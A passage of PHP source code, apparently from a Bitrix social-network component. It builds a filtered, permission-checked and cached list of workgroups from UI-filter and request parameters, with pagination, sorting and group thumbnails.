				"CONTEXT" => "SONET_GROUP_LIST_FILTER_MEMBER",
				"CODE" => $filterData['MEMBER']
			));
		}

		if (
			isset($filterData['OWNER'])
			&& !empty($filterData['OWNER'])
			&& preg_match('/^U(\d+)$/is', $filterData['OWNER'], $matches)
			&& !empty($matches[1])
			&& intval($matches[1]) > 0
		)
		{
			$filtered = true;
			$arResult["filter_owner"] = intval($matches[1]);

			\Bitrix\Main\FinderDestTable::merge(array(
				"CONTEXT" => "SONET_GROUP_LIST_FILTER_OWNER",
				"CODE" => $filterData['OWNER']
			));
		}

		if (isset($filterData['EXTRANET']))
		{
			$arResult["filter_extranet"] = $filterData['EXTRANET'];
		}

		if (
			isset($filterData['FAVORITES'])
			&& $filterData['FAVORITES'] == 'Y'
		)
		{
			$arResult["filter_favorites"] = 'Y';
		}

		if (!empty($filterData['TAG']))
		{
			$arResult["~tags"] = $filterData['TAG'];
			$arResult["tags"] = htmlspecialcharsex($filterData['TAG']);
		}

		if (isset($filterData['CLOSED']))
		{
			$arResult["filter_archive"] = $filterData['CLOSED'];
		}
		else // set for later isset() check
		{
			$arResult["filter_archive"] = "";
		}

		if (isset($filterData['PROJECT']))
		{
			$arResult["filter_project"] = $filterData['PROJECT'];
		}

		if (!empty($filterData["PROJECT_DATE_START_from"]))
		{
			$filtered = true;
			$arGroupFilter[">=PROJECT_DATE_START"] = $filterData["PROJECT_DATE_START_from"];
		}

		if (!empty($filterData["PROJECT_DATE_START_to"]))
		{
			$filtered = true;
			$arGroupFilter["<=PROJECT_DATE_START"] = ConvertTimeStamp(MakeTimeStamp($filterData["PROJECT_DATE_START_to"], CSite::getDateFormat("SHORT")) + 86399, "FULL");
		}

		if (!empty($filterData["PROJECT_DATE_FINISH_from"]))
		{
			$filtered = true;
			$arGroupFilter[">=PROJECT_DATE_FINISH"] = $filterData["PROJECT_DATE_FINISH_from"];
		}

		if (!empty($filterData["PROJECT_DATE_FINISH_to"]))
		{
			$filtered = true;
			$arGroupFilter["<=PROJECT_DATE_FINISH"] = ConvertTimeStamp(MakeTimeStamp($filterData["PROJECT_DATE_FINISH_to"], CSite::getDateFormat("SHORT")) + 86399, "FULL");
		}

		$groupPropertiesList = $USER_FIELD_MANAGER->GetUserFields("SONET_GROUP", 0, LANGUAGE_ID);
		$availableUFTypes = ['date', 'datetime', 'string', 'double', 'boolean', 'crm'];

		foreach($groupPropertiesList as $field => $arUserField)
		{
			if (
				empty($arUserField['SHOW_FILTER'])
				|| $arUserField['SHOW_FILTER'] == 'N'
			)
			{
				unset($groupPropertiesList[$field]);
				continue;
			}

			$type = $arUserField['USER_TYPE_ID'];

			if (!in_array($type, $availableUFTypes))
			{
				$type = 'string';
			}
			if ($type == 'datetime')
			{
				$type = 'date';
			}

			if ($type == 'double')
			{
				$type = 'number';
			}

			if ($type == 'date')
			{
				if (!empty($filterData[$field."_from"]))
				{
					$filtered = true;
					$arGroupFilter[">=".$field] = $filterData[$field."_from"];
				}

				if (!empty($filterData[$field."_to"]))
				{
					$filtered = true;
					$arGroupFilter["<=".$field] = $filterData[$field."_to"];
				}
			}
			elseif (
				in_array($type, array('number', 'string', 'boolean'))
				&& isset($filterData[$field])
			)
			{
				$filtered = true;
				$arGroupFilter["=".$field] = $filterData[$field];
			}
		}
	}
	else // main.ui.filter without CLOSED
	{
		$arResult["filter_archive"] = "";
	}
}

if ($filtered)
{
	$arParams["CACHE_TIME"] = 0;
}

if ($arParams["PAGE"] == "groups_list")
{
	if (
		array_key_exists("filter_my", $_REQUEST)
		&& $_REQUEST["filter_my"] == "Y"
	)
	{
		$arResult["filter_my"] = $_REQUEST["filter_my"];
	}

	if (array_key_exists("filter_subject_id", $_REQUEST) && intval($_REQUEST["filter_subject_id"]) > 0)
		$arResult["filter_subject_id"] = $_REQUEST["filter_subject_id"];

	if (array_key_exists("filter_archive", $_REQUEST) && $_REQUEST["filter_archive"] == "Y")
		$arResult["filter_archive"] = $_REQUEST["filter_archive"];

	if (intval($arParams["SUBJECT_ID"]) == -1)
	{
		$arResult["filter_archive"] = "Y";
	}

	if (array_key_exists("filter_extranet", $_REQUEST) && strlen($_REQUEST["filter_extranet"]) > 0)
		$arResult["filter_extranet"] = $_REQUEST["filter_extranet"];

	if (
		!isset($arResult["filter_project"])
		&& !empty($_REQUEST["filter_project"])
		&& in_array($_REQUEST["filter_project"], array('Y', 'N'))
	)
	{
		$arResult["filter_project"] = $_REQUEST["filter_project"];
	}

	if (
		array_key_exists("filter_favorites", $_REQUEST)
		&& strlen($_REQUEST["filter_favorites"]) > 0
		&& $USER->IsAuthorized()
	)
	{
		$arResult["filter_favorites"] = $_REQUEST["filter_favorites"];
	}

	if (
		!isset($arResult["filter_tags"])
		&& array_key_exists("filter_tags", $_REQUEST)
		&& strlen($_REQUEST["filter_tags"]) > 0
	)
	{
		$arResult["filter_tags"] = $_REQUEST["filter_tags"];
	}

	if (
		array_key_exists("tags", $_REQUEST)
		&& strlen($_REQUEST["tags"]) > 0
	)
	{
		$arResult["~tags"] = $_REQUEST["tags"];
		$arResult["tags"] = htmlspecialcharsbx($arResult["~tags"]);
	}
}

if (
	$arParams["PAGE"] == "groups_subject"
	&& intval($arParams["SUBJECT_ID"]) > 0
)
{
	$arResult["filter_subject_id"] = intval($arParams["SUBJECT_ID"]);
}

$arResult["WORKGROUPS_PATH"] = COption::GetOptionString("socialnetwork", "workgroups_list_page", false, SITE_ID);
$arParams["SET_NAV_CHAIN"] = ($arParams["SET_NAV_CHAIN"] == "N" ? "N" : "Y");

if(strLen($arParams["USER_VAR"])<=0)
	$arParams["USER_VAR"] = "user_id";
if(strLen($arParams["GROUP_VAR"])<=0)
	$arParams["GROUP_VAR"] = "group_id";
if(strLen($arParams["PAGE_VAR"])<=0)
	$arParams["PAGE_VAR"] = "page";

$arParams["PATH_TO_USER"] = trim($arParams["PATH_TO_USER"]);
if(strlen($arParams["PATH_TO_USER"])<=0)
	$arParams["PATH_TO_USER"] = htmlspecialcharsbx($APPLICATION->GetCurPage()."?".$arParams["PAGE_VAR"]."=user&".$arParams["USER_VAR"]."=#user_id#");

$arParams["PATH_TO_GROUP"] = trim($arParams["PATH_TO_GROUP"]);
if (strlen($arParams["PATH_TO_GROUP"]) <= 0)
	$arParams["PATH_TO_GROUP"] = htmlspecialcharsbx($APPLICATION->GetCurPage()."?".$arParams["PAGE_VAR"]."=group&".$arParams["GROUP_VAR"]."=#group_id#");

$arParams["PATH_TO_GROUP_EDIT"] = trim($arParams["PATH_TO_GROUP_EDIT"]);
if (strlen($arParams["PATH_TO_GROUP_EDIT"]) <= 0)
	$arParams["PATH_TO_GROUP_EDIT"] = htmlspecialcharsbx($APPLICATION->GetCurPage()."?".$arParams["PAGE_VAR"]."=group_edit&".$arParams["GROUP_VAR"]."=#group_id#");

$arParams["PATH_TO_GROUP_CREATE"] = trim($arParams["PATH_TO_GROUP_CREATE"]);
if (strlen($arParams["PATH_TO_GROUP_CREATE"]) <= 0)
	$arParams["PATH_TO_GROUP_CREATE"] = htmlspecialcharsbx($APPLICATION->GetCurPage()."?".$arParams["PAGE_VAR"]."=group_create&".$arParams["USER_VAR"]."=#user_id#");

$arParams["PATH_TO_GROUP_SEARCH"] = trim($arParams["PATH_TO_GROUP_SEARCH"]);
if (strlen($arParams["PATH_TO_GROUP_SEARCH"]) <= 0)
	$arParams["PATH_TO_GROUP_SEARCH"] = htmlspecialcharsbx($APPLICATION->GetCurPage()."?".$arParams["PAGE_VAR"]."=group_search");

$arParams["PATH_TO_GROUP_REQUEST_USER"] = trim($arParams["PATH_TO_GROUP_REQUEST_USER"]);
if (strlen($arParams["PATH_TO_GROUP_REQUEST_USER"]) <= 0)
	$arParams["PATH_TO_GROUP_REQUEST_USER"] = htmlspecialcharsbx($APPLICATION->GetCurPage()."?".$arParams["PAGE_VAR"]."=group_request_user&".$arParams["USER_VAR"]."=#user_id#&".$arParams["GROUP_VAR"]."=#group_id#");

$arParams["PATH_TO_LOG"] = trim($arParams["PATH_TO_LOG"]);
if (strlen($arParams["PATH_TO_LOG"]) <= 0)
	$arParams["PATH_TO_LOG"] = htmlspecialcharsbx($APPLICATION->GetCurPage()."?".$arParams["PAGE_VAR"]."=log");

$arParams["ITEMS_COUNT"] = IntVal($arParams["ITEMS_COUNT"]);
if ($arParams["ITEMS_COUNT"] <= 0)
	$arParams["ITEMS_COUNT"] = 30;

/* obsolete parameter for default template */
$arParams["COLUMNS_COUNT"] = IntVal($arParams["COLUMNS_COUNT"]);
if ($arParams["COLUMNS_COUNT"] <= 0)
	$arParams["COLUMNS_COUNT"] = 3;

$arParams["DATE_TIME_FORMAT"] = Trim($arParams["DATE_TIME_FORMAT"]);
$arParams["DATE_TIME_FORMAT"] = ((StrLen($arParams["DATE_TIME_FORMAT"]) <= 0) ? $DB->DateFormatToPHP(CSite::GetDateFormat("FULL")) : $arParams["DATE_TIME_FORMAT"]);

/***************** CACHE ****************************************/
if(!isset($arParams["CACHE_TIME"]))
	$arParams["CACHE_TIME"] = 3600;
if ($arParams["CACHE_TYPE"] == "Y" || ($arParams["CACHE_TYPE"] == "A" && COption::GetOptionString("main", "component_cache_on", "Y") == "Y"))
	$arParams["CACHE_TIME"] = intval($arParams["CACHE_TIME"]);
else
	$arParams["CACHE_TIME"] = 0;

$groupCache = new CPHPCache;
$cachePath = str_replace(array(":", "//"), "/", "/".SITE_ID."/".$componentName);
/********************************************************************/

$arResult["FatalError"] = "";

if (
	(
		in_array($arParams["PAGE"], array("group_request_group_search", "user_groups"))
		|| $arResult["filter_my"] == "Y"
	)
	&& $user4Groups <= 0
)
{
	$arResult["FatalError"] = Loc::getMessage("SONET_C36_NO_USER_ID").". ";
}

if (StrLen($arResult["FatalError"]) <= 0)
{
	if ($arParams["PAGE"] == "group_request_group_search")
	{
		if ($user2Request <= 0)
			$arResult["FatalError"] = Loc::getMessage("SONET_C36_NO_USER_ID").". ";
		elseif ($user2Request == $user4Groups)
			$arResult["FatalError"] = Loc::getMessage("SONET_C36_SELF").". ";
	}
}

if (strlen($arResult["FatalError"]) <= 0)
{
	if ($arParams["PAGE"] == "groups_list")
	{
		$arResult["Subjects"] = array();
		$dbSubjects = CSocNetGroupSubject::GetList(
			array("SORT" => "ASC", "NAME" => "ASC"),
			array("SITE_ID" => SITE_ID),
			false,
			false,
			array("ID", "NAME")
		);
		while ($arSubject = $dbSubjects->GetNext())
			$arResult["Subjects"][$arSubject["ID"]] = $arSubject["NAME"];
	}
	elseif ($arParams["PAGE"] == "groups_subject" && intval($arResult["filter_subject_id"]) > 0)
	{

		$arResult["Subjects"] = array();
		$dbSubjects = CSocNetGroupSubject::GetList(
			array("SORT" => "ASC", "NAME" => "ASC"),
			array("SITE_ID" => SITE_ID, "ID" => intval($arResult["filter_subject_id"])),
			false,
			false,
			array("ID", "NAME")
		);
		if ($arSubject = $dbSubjects->GetNext())
			$arResult["Subject"] = $arSubject;
	}
}

if (
	StrLen($arResult["FatalError"]) <= 0
	&& intval($user4Groups) > 0
)
{
	$dbUser = CUser::GetByID($user4Groups);
	$arResult["User"] = $dbUser->GetNext();

	if (!is_array($arResult["User"]))
		$arResult["FatalError"] = Loc::getMessage("SONET_P_USER_NO_USER").". ";
	if (CModule::IncludeModule('extranet') && !CExtranet::IsProfileViewable($arResult["User"]))
		return false;
}

if (StrLen($arResult["FatalError"]) <= 0)
{
	$arResult["UserRequest"] = false;
	if ($user2Request > 0)
	{
		$dbUser = CUser::GetByID($user2Request);
		$arResult["UserRequest"] = $dbUser->GetNext();

		if (!is_array($arResult["UserRequest"]))
			$arResult["FatalError"] = Loc::getMessage("SONET_P_USER_NO_USER").". ";
		if (CModule::IncludeModule('extranet') && !CExtranet::IsProfileViewable($arResult["UserRequest"]))
			return false;
	}
}

if (StrLen($arResult["FatalError"]) <= 0)
{
	$arResult["CurrentUserPerms"] = CSocNetUserPerms::InitUserPerms($USER->GetID(), $arResult["User"]["ID"], CSocNetUser::IsCurrentUserModuleAdmin());
	$arResult["ALLOW_CREATE_GROUP"] = (CSocNetUser::IsCurrentUserModuleAdmin() || $APPLICATION->GetGroupRight("socialnetwork", false, "Y", "Y", array(SITE_ID, false)) >= "K");

	$arCacheKeys = array();
	$arNavigation = array();

	foreach ($arResult as $key => $value)
	{
		if (substr($key, 0, 7) == "filter_")
		{
			$arCacheKeys[] = $key."_".$value;
		}
	}

	$nav = new \Bitrix\Main\UI\PageNavigation($arResult["NAV_ID"]);
	$nav->allowAllRecords(false)->setPageSize($arParams["ITEMS_COUNT"])->initFromUri();

	$arNavigation = array(
		'ITEMS_COUNT' => $arParams["ITEMS_COUNT"],
		'CURRENT_PAGE' => $nav->getCurrentPage(),
		'ALL_RECORDS_SHOWN' => $nav->allRecordsShown()
	);

	$arCacheKeys = array_merge($arCacheKeys, $arNavigation);

	if (array_key_exists("tags", $arResult) && strlen($arResult["tags"]) > 0)
	{
		$arCacheKeys[] = $arResult["tags"];
	}

	$arCacheKeys[] = $arResult["ORDER_KEY"];
	$arCacheResult = array();

	$cacheId = "socnet_user_groups_".SITE_ID.LANGUAGE_ID.'_'.$arParams["PAGE"]."_".$USER->GetID()."_"."_".$arResult["User"]["ID"]."_".md5(serialize($arCacheKeys))."_".intval(CSocNetUser::IsCurrentUserModuleAdmin());
	if (
		$arParams["CACHE_TIME"] > 0
		&& $groupCache->InitCache($arParams["CACHE_TIME"], $cacheId, $cachePath)
	)
	{
		$vars = $groupCache->GetVars();
		$arCacheResult = $vars["arCacheResult"];

		if (!empty($arCacheResult["ASSETS"]))
		{
			if (!empty($arCacheResult["ASSETS"]["CSS"]))
			{
				foreach($arCacheResult["ASSETS"]["CSS"] as $cssFile)
				{
					\Bitrix\Main\Page\Asset::getInstance()->addCss($cssFile);
				}
			}

			if (!empty($arCacheResult["ASSETS"]["JS"]))
			{
				foreach($arCacheResult["ASSETS"]["JS"] as $jsFile)
				{
					\Bitrix\Main\Page\Asset::getInstance()->addJs($jsFile);
				}
			}
		}
	}
	else
	{
		if (
			$arParams["CACHE_TIME"] > 0
			&& defined("BX_COMP_MANAGED_CACHE")
		)
		{
			$CACHE_MANAGER->startTagCache($cachePath);

			if (
				isset($arResult["ORDER_KEY"])
				&& $arResult["ORDER_KEY"] == 'date_view'
				&& $arParams["USER_ID"] == $USER->getId()
			)
			{
				$CACHE_MANAGER->registerTag("sonet_group_view_U".$arParams["USER_ID"]);
			}

			$CACHE_MANAGER->registerTag("sonet_user2group_U".$arParams["USER_ID"]);
			$CACHE_MANAGER->registerTag("sonet_group");

			if (
				isset($arResult["ORDER_KEY"])
				&& $arResult["ORDER_KEY"] == 'date_activity'
			)
			{
				$CACHE_MANAGER->registerTag("sonet_group_activity");
			}

			if (
				$USER->isAuthorized()
				&& $arParams["USER_ID"] == $USER->getId()
			)
			{
				$CACHE_MANAGER->registerTag("sonet_group_favorites_U".$arParams["USER_ID"]);
			}
		}

		$arGroupID = Array();

		if (
			in_array($arParams["PAGE"], array("groups_list", "groups_subject")) 
			|| $arResult["CurrentUserPerms"] && $arResult["CurrentUserPerms"]["Operations"]["viewgroups"]
		)
		{
			$arNavParams = array("nPageSize" => $arParams["ITEMS_COUNT"], "bDescPageNumbering" => false);

			$arCacheResult["Urls"]["GroupsAdd"] = CComponentEngine::MakePathFromTemplate($arParams["PATH_TO_GROUP_CREATE"], array("user_id" => $arResult["User"]["ID"]));
			$arCacheResult["Urls"]["LogGroups"] = CComponentEngine::MakePathFromTemplate($arParams["PATH_TO_LOG"], array());
			$arCacheResult["Urls"]["LogGroups"] .= ((StrPos($arCacheResult["Urls"]["LogGroups"], "?") !== false) ? "&" : "?")."flt_entity_type=".SONET_ENTITY_GROUP;
			$arCacheResult["CanViewLog"] = ($arResult["User"]["ID"] == $USER->GetID());

			$arCacheResult["Groups"] = false;

			if (!empty($arResult["filter_name"]))
			{
				if ($arResult["USE_UI_FILTER"])
				{
					$operation = \Bitrix\Socialnetwork\WorkgroupTable::getEntity()->fullTextIndexEnabled("SEARCH_INDEX") ? '*' : '*%';
					$arGroupFilter[$operation."SEARCH_INDEX"] = \Bitrix\Socialnetwork\Item\Workgroup::prepareToken($arResult["filter_name"]);
				}
				else
				{
					$arGroupFilter[] = array(
						'LOGIC' => 'OR',
						'%NAME' => $arResult["filter_name"],
						'%DESCRIPTION' => $arResult["filter_name"]
					);
				}
			}

			if (!empty($arResult["filter_name_only"])) // USE_UI_FILTER == Y
			{
				$arGroupFilter['%NAME'] = $arResult["filter_name_only"];
			}

			$arGroupFilter["=WorkgroupSite:GROUP.SITE_ID"] = SITE_ID;

			if (!CSocNetUser::IsCurrentUserModuleAdmin())
			{
				$arAvailableGroupID = array();
				$dbGroups = CSocnetGroup::GetList(
					array("ID" => "ASC"),
					array(
						"SITE_ID" => SITE_ID,
						"CHECK_PERMISSIONS" => $USER->GetID()
					),
					false,
					false,
					array("ID")
				);

				while ($arGroups = $dbGroups->GetNext())
				{
					if (!in_array($arGroups["ID"], $arAvailableGroupID))
					{
						$arAvailableGroupID[] = $arGroups["ID"];
					}
				}

				if (empty($arAvailableGroupID))
				{
					$bNoMyGroups = true;
				}
				else
				{
					$arGroupFilter["ID"] = $arAvailableGroupID;
				}
			}

			if (
				COption::GetOptionString("socialnetwork", "work_with_closed_groups", "N") != "Y" 
				&& $arResult["filter_tags"] != "Y"
			)
			{
				if (isset($arResult["filter_archive"])) // bitrix24 ui.filter
				{
					if (!empty($arResult["filter_archive"]))
					{
						$arGroupFilter["=CLOSED"] = ($arResult["filter_archive"] == "Y" ? "Y" : "N");
					}
				}
				else // not bitrix24
				{
					$arGroupFilter["=CLOSED"] = "N";
				}
			}

			if (intval($arResult["filter_subject_id"]) > 0)
			{
				$arGroupFilter["WORKGROUP_SUBJECT.ID"] = intval($arResult["filter_subject_id"]);
			}

			// get my groups for extranet
			if (
				CModule::IncludeModule("extranet") 
				&& CExtranet::IsExtranetSite()
			)
			{
				$arCacheResult["bExtranet"] = true;
				if (!$USER->IsAdmin() && !CSocNetUser::IsCurrentUserModuleAdmin())
				{
					$arGroupFilterMy = array(
						"USER_ID" => $USER->GetID(),
						"<=ROLE" => SONET_ROLES_USER,
						"GROUP_SITE_ID" => SITE_ID,
						"GROUP_ACTIVE" => "Y"
					);

					$dbGroups = CSocNetUserToGroup::GetList(
						array("GROUP_NAME" => "ASC"),
						$arGroupFilterMy,
						false,
						false,
						array("GROUP_ID")
					);

					$arMyGroups = array();
					while ($arGroups = $dbGroups->GetNext())
					{
						$arMyGroups[] = $arGroups["GROUP_ID"];
					}

					if (count($arMyGroups) <= 0)
					{
						$bNoMyGroups = true;
					}
					else
					{
						$arGroupFilter["ID"] = (!empty($arGroupFilter["ID"]) ? array_intersect($arGroupFilter["ID"], $arMyGroups) : $arMyGroups);
					}
				}
			}
			else
			{
				// not extranet
				if (
					$arResult["filter_my"] == "Y"
					|| in_array($arParams["PAGE"], array("user_groups", "user_projects"))
				)
				{
					$arUserGroupFilter["USER_ID"] = $arResult["User"]["ID"];
					$arUserGroupFilter["<=ROLE"] = SONET_ROLES_USER;
				}

				if (!empty($arResult["filter_project"]))
				{
					$arGroupFilter["=PROJECT"] = $arResult["filter_project"];
				}
				elseif ($arParams["PAGE"] == "user_projects")
				{
					$arGroupFilter["=PROJECT"] = 'Y';
				}

				if (
					!empty($arResult["filter_extranet"])
					&& CModule::IncludeModule("extranet")
					&& !CExtranet::IsExtranetSite()

				)
				{
					if ($arResult["filter_extranet"] == 'Y')
					{
						$arUserGroupFilter["=GROUP_SITE_ID"] = CExtranet::GetExtranetSiteID();
						if (!CSocNetUser::isCurrentUserModuleAdmin())
						{
							$arUserGroupFilter["USER_ID"] = $arResult["User"]["ID"];
							$arUserGroupFilter["<=ROLE"] = SONET_ROLES_USER;
						}
					}
					else
					{
						$arUserGroupFilter["!=GROUP_SITE_ID"] = CExtranet::GetExtranetSiteID();
					}
				}

				if (
					!$arResult["CurrentUserPerms"]["IsCurrentUser"] 
					&& !CSocNetUser::IsCurrentUserModuleAdmin()
				)
				{
					$arGroupFilter["=VISIBLE"] = "Y";
				}
			}

			if (
				isset($arResult["filter_member"])
				&& $arResult["filter_member"] > 0
			)
			{
				if (!empty($arUserGroupFilter["USER_ID"]))
				{
					$arUserGroupFilter2 = array(
						"USER_ID" => $arResult["filter_member"],
						"<=ROLE" => UserToGroupTable::ROLE_USER
					);
				}
				else
				{
					$arUserGroupFilter["USER_ID"] = $arResult["filter_member"];
					$arUserGroupFilter["<=ROLE"] = UserToGroupTable::ROLE_USER;
				}
			}

			if (
				isset($arResult["filter_owner"])
				&& $arResult["filter_owner"] > 0
			)
			{
				if (!empty($arUserGroupFilter["USER_ID"]))
				{
					$arUserGroupFilter2 = array(
						"USER_ID" => $arResult["filter_owner"],
						"<=ROLE" => UserToGroupTable::ROLE_OWNER
					);
				}
				else
				{
					$arUserGroupFilter["USER_ID"] = $arResult["filter_owner"];
					$arUserGroupFilter["<=ROLE"] = UserToGroupTable::ROLE_OWNER;
				}
			}

			if (
				$arParams["USE_KEYWORDS"] == "Y"
				&& strlen($arResult["~tags"]) > 0 
				&& CModule::IncludeModule("search")
			)
			{
				$arFilter = array(
					"SITE_ID" => SITE_ID,
					"QUERY" => "",
					array(
						"=MODULE_ID" => "socialnetwork",
						"PARAMS" => array(
							"entity" => "socnet_group",
						),
					),
					"CHECK_DATES" => "Y",
					"TAGS" => $arResult["~tags"]
				);
				$aSort = array("DATE_CHANGE" => "DESC", "CUSTOM_RANK" => "DESC", "RANK" => "DESC");

				$obSearch = new CSearch();
				$obSearch->Search($arFilter);
				if ($obSearch->errorno == 0)
				{
					$arTagGroups = array();
					while ($arSearch = $obSearch->Fetch())
					{
						if (intval($arSearch["PARAM2"]) > 0)
						{
							$arTagGroups[] = $arSearch["PARAM2"];
						}
					}

					if (empty($arTagGroups))
					{
						$bNoMyGroups = true;
					}

					if (
						!empty($arTagGroups)
						&& !$bNoMyGroups
					)
					{
						$arGroupFilter["ID"] = (!empty($arGroupFilter["ID"]) ? array_intersect($arGroupFilter["ID"], $arTagGroups) : $arTagGroups);
					}
				}
			}

			if (
				!$bNoMyGroups
				&& !empty($arUserGroupFilter)
			)
			{
				$arUserGroupsList = array();
				$dbUserGroups = CSocNetUserToGroup::getList(
					array("GROUP_NAME" => "ASC"),
					$arUserGroupFilter,
					false,
					false,
					array("GROUP_ID")
				);
				if ($dbUserGroups)
				{
					while ($arUserGroups = $dbUserGroups->GetNext())
					{
						$arUserGroupsList[] = $arUserGroups["GROUP_ID"];
					}
					$arUserGroupsList = array_unique($arUserGroupsList);
				}

				if (
					!empty($arUserGroupsList)
					&& !empty($arUserGroupFilter2)
				)
				{
					$dbUserGroups = UserToGroupTable::getList(array(
						'filter' => array_merge(array('@GROUP_ID' => $arUserGroupsList), $arUserGroupFilter2),
						'select' => array('GROUP_ID')
					));

					$arUserGroupsList = array();

					while ($arUserGroups = $dbUserGroups->fetch())
					{
						if (!in_array($arUserGroups["GROUP_ID"], $arUserGroupsList))
						{
							$arUserGroupsList[] = $arUserGroups["GROUP_ID"];
						}
					}
				}

				$arGroupFilter["ID"] = (!empty($arGroupFilter["ID"]) ? array_intersect($arGroupFilter["ID"], $arUserGroupsList) : $arUserGroupsList);

				if (empty($arGroupFilter["ID"]))
				{
					$bNoMyGroups = true;
				}
			}
		}

		if (
			!$bNoMyGroups
			&& (
				$arResult["filter_my"] == "Y"
				|| (
					$arParams["PAGE"] == "user_groups"
					&& !$USER->IsAdmin()
					&& !CSocNetUser::IsCurrentUserModuleAdmin()
				)
				|| (
					$arParams["PAGE"] == "user_groups"
					&& (
						$USER->IsAdmin()
						|| CSocNetUser::IsCurrentUserModuleAdmin()
					)
					&& (IntVal($USER->GetID()) != $arParams["USER_ID"])
				)
				|| $arResult["filter_extranet"] == "Y"
			)
			&& (
				!array_key_exists("ID", $arGroupFilter) 
				|| !is_array($arGroupFilter["ID"]) 
				|| count($arGroupFilter["ID"]) <= 0
			)
		)
		{
			$bNoMyGroups = true;
		}

		if (!$bNoMyGroups)
		{
			$arCacheResult["Groups"] = array();
			$arCacheResult["Groups"]["List"] = false;

			$arFilterTmp = array();
			$dbGroupTmp = \Bitrix\Socialnetwork\WorkgroupTable::getList(array(
				'order' => array(
					'ID' => 'ASC'
				),
				'filter' => $arGroupFilter,
				'group' => array("ID"),
				'select' => array("ID"),
				'data_doubling' => false
			));

			while ($arGroupTmp = $dbGroupTmp->Fetch())
			{
				$arFilterTmp[] = $arGroupTmp["ID"];
			}

			if (!empty($arFilterTmp))
			{
				$nav = new \Bitrix\Main\UI\PageNavigation($arResult["NAV_ID"]);
				$nav->allowAllRecords(false)->setPageSize($arParams["ITEMS_COUNT"])->initFromUri();

				$query = new \Bitrix\Main\Entity\Query(\Bitrix\Socialnetwork\WorkgroupTable::getEntity());

				switch($arResult["ORDER_KEY"])
				{
					case 'alpha':
						$query->addOrder('NAME', 'ASC');
						break;
					case 'date_activity':
						$query->addOrder('DATE_ACTIVITY', 'DESC');
						break;
					case 'date_create':
						$query->addOrder('DATE_CREATE', 'DESC');
						break;
					case 'date_request':
						if ($USER->isAuthorized())
						{
							$query->registerRuntimeField(
								'',
								new \Bitrix\Main\Entity\ReferenceField('UG',
									\Bitrix\Socialnetwork\UserToGroupTable::getEntity(),
									array(
										'=ref.GROUP_ID' => 'this.ID',
										'=ref.USER_ID' =>  new \Bitrix\Main\DB\SqlExpression($USER->getId())
									),
									array('join_type' => 'LEFT')
								)
							);
							$query->addOrder('UG.DATE_UPDATE', 'DESC');
						}
						break;
					case 'date_view':
						if ($USER->isAuthorized())
						{
							$query->registerRuntimeField(
								'',
								new \Bitrix\Main\Entity\ReferenceField('GV',
									\Bitrix\Socialnetwork\WorkgroupViewTable::getEntity(),
									array(
										'=ref.GROUP_ID' => 'this.ID',
										'=ref.USER_ID' =>  new \Bitrix\Main\DB\SqlExpression($USER->getId())
									),
									array('join_type' => 'LEFT')
								)
							);
							$query->addOrder('GV.DATE_VIEW', 'DESC');
						}
						break;
					case 'members_count':
						$query->addOrder('NUMBER_OF_MEMBERS', 'DESC');
						break;
					default:
						$query->addOrder('NAME', 'ASC');
				}

				if (
					$arResult["filter_favorites"] == "Y"
					&& $USER->isAuthorized()
				)
				{
					$query->registerRuntimeField(
						'',
						new \Bitrix\Main\Entity\ReferenceField('GF',
							\Bitrix\Socialnetwork\WorkgroupFavoritesTable::getEntity(),
							array(
								'=ref.GROUP_ID' => 'this.ID'
							),
							array('join_type' => 'INNER')
						)
					);
					$query->addFilter('=GF.USER_ID', $USER->getId());
				}

				$query->addFilter('@ID', $arFilterTmp);

				$query->addSelect('ID');
				$query->addSelect('NAME');
				$query->addSelect('DESCRIPTION');
				$query->addSelect('IMAGE_ID');
				$query->addSelect('VISIBLE');
				$query->addSelect('OWNER_ID');
				$query->addSelect('INITIATE_PERMS');
				$query->addSelect('OPENED');
				$query->addSelect('CLOSED');
				$query->addSelect('NUMBER_OF_MEMBERS');

				$query->countTotal(true);
				$query->setOffset($nav->getOffset());
				$query->setLimit($nav->getLimit());

				$dbGroup = $query->exec();

				$nav->setRecordCount($dbGroup->getCount());
			}

			if ($dbGroup)
			{
				while ($arGroup = $dbGroup->fetch())
				{
					$arGroup["NAME"] = htmlspecialcharsEx($arGroup["NAME"]);
					$arGroup["DESCRIPTION"] = htmlspecialcharsEx($arGroup["DESCRIPTION"]);

					if ($arCacheResult["Groups"]["List"] == false)
					{
						$arCacheResult["Groups"]["List"] = array();
					}

					$pu = CComponentEngine::MakePathFromTemplate($arParams["PATH_TO_GROUP"], array("group_id" => $arGroup["ID"]));

					if (intval($arGroup["IMAGE_ID"]) <= 0)
					{
						$arGroup["IMAGE_ID"] = COption::GetOptionInt("socialnetwork", "default_group_picture", false, SITE_ID);
					}

					$arImageResized = $arImageResizedCommon = false;
					$imageFile = CFile::GetFileArray($arGroup["IMAGE_ID"]);
					if ($imageFile !== false)
					{
						$arImageResized = CFile::ResizeImageGet(
							$imageFile,
							array("width" => $arParams["THUMBNAIL_SIZE"], "height" => $arParams["THUMBNAIL_SIZE"]),
							BX_RESIZE_IMAGE_EXACT
						);
						$arImageResizedCommon = CFile::ResizeImageGet(
							$imageFile,
							array("width" => $arParams["THUMBNAIL_SIZE_COMMON"], "height" => $arParams["THUMBNAIL_SIZE_COMMON"]),
							BX_RESIZE_IMAGE_EXACT
						);
					}

					$arImage = CSocNetTools::InitImage($arGroup["IMAGE_ID"], 150, "/bitrix/images/socialnetwork/nopic_group_150.gif", 150, $pu, true);

					if ($arParams["PAGE"] == "group_request_group_search")
						$arCurrentUserPerms4Group = CSocNetUserToGroup::InitUserPerms($arResult["User"]["ID"], array("ID" => $arGroup["ID"], "OWNER_ID" => $arGroup["OWNER_ID"], "INITIATE_PERMS" => $arGroup["INITIATE_PERMS"], "VISIBLE" => $arGroup["VISIBLE"], "OPENED" => $arGroup["OPENED"]), CSocNetUser::IsCurrentUserModuleAdmin());

					$arCacheResult["Groups"]["List"][] = array(
						"GROUP_ID" => $arGroup["ID"],
						"GROUP_NAME" => $arGroup["NAME"],
						"GROUP_CLOSED" => $arGroup["CLOSED"],
						"GROUP_DESCRIPTION" => (strlen($arGroup["DESCRIPTION"]) > 50 ? substr($arGroup["DESCRIPTION"], 0, 50)."..." : $arGroup["DESCRIPTION"]),
						"GROUP_DESCRIPTION_FULL" => $arGroup["DESCRIPTION"],
						"GROUP_PHOTO" => $arGroup["IMAGE_ID"],
						"GROUP_PHOTO_FILE" => $arImage["FILE"],
						"GROUP_PHOTO_IMG" => $arImage["IMG"],
						"GROUP_PHOTO_RESIZED" => $arImageResized,
						"GROUP_PHOTO_RESIZED_COMMON" => $arImageResizedCommon,
